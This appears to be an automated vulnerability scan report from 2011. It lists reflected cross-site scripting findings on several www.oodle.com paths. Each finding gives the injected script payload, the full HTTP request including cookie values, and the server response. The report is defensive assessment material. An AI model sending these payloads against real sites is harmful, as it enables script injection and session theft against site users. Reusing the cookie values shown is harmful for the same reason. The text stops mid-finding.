GET /message/no-script-warning690ef"-alert(1)-"98de376fdff/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:27 GMT Content-Length: 23784 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyNzt9; path=/; domain=.oodle.com
1.40. http://www.oodle.com/message/no-script-warning/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/message/no-script-warning/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4024"><script>alert(1)</script>803f18c08fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /message/no-script-warning/?d4024"><script>alert(1)</script>803f18c08fb=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:07 GMT Content-Length: 23561 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEwNzt9; path=/; domain=.oodle.com
1.41. http://www.oodle.com/message/no-script-warning/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/message/no-script-warning/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9d69"-alert(1)-"6eff88e7e87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /message/no-script-warning/?c9d69"-alert(1)-"6eff88e7e87=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:09 GMT Content-Length: 23496 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEwOTt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed50d"-alert(1)-"cde6cc40afb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /proed50d"-alert(1)-"cde6cc40afb/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:31 GMT Content-Length: 23720 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEzMTt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e85e1"><script>alert(1)</script>70327e69947 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /proe85e1"><script>alert(1)</script>70327e69947/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:30 GMT Content-Length: 23761 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEzMDt9; path=/; domain=.oodle.com
1.44. http://www.oodle.com/pro/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/pro/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14f76"><script>alert(1)</script>68d8b41e599 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro/?14f76"><script>alert(1)</script>68d8b41e599=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:17 GMT Content-Length: 16975 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDExNzt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h ...[SNIP]... <meta property="og:url" content="http://www.oodle.com/pro/?14f76"><script>alert(1)</script>68d8b41e599=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b105"-alert(1)-"e3a6608b9d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:49:46 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjU4Njt9; path=/; domain=.oodle.com Content-Length: 23861
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1033d"><script>alert(1)</script>b87c463f7d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:49:45 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjU4NTt9; path=/; domain=.oodle.com Content-Length: 23912
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e657"><script>alert(1)</script>f705df68ec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:49:49 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjU4OTt9; path=/; domain=.oodle.com Content-Length: 12737
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2af75"-alert(1)-"38ac4d7f81b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:49:50 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjU5MDt9; path=/; domain=.oodle.com Content-Length: 12701
1.49. http://www.oodle.com/pro/fb-follow [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/pro/fb-follow
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e9e9"><script>alert(1)</script>44c911ad155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro/fb-follow?6e9e9"><script>alert(1)</script>44c911ad155=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:38 GMT Content-Length: 10589 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEzODt9; path=/; domain=.oodle.com
1.50. http://www.oodle.com/pro/fb-follow [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/pro/fb-follow
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 240fd"-alert(1)-"52b46493f8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pro/fb-follow?240fd"-alert(1)-"52b46493f8e=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:44 GMT Content-Length: 10534 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDE0NDt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 208af"><script>alert(1)</script>a1612fed7df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro208af"><script>alert(1)</script>a1612fed7df/register/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:12 GMT Content-Length: 23800 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDExMjt9; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a477e"-alert(1)-"9d8dcaf7876 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /proa477e"-alert(1)-"9d8dcaf7876/register/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:14 GMT Content-Length: 23749 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDExMzt9; path=/; domain=.oodle.com
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2636"><script>alert(1)</script>e02086d22ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
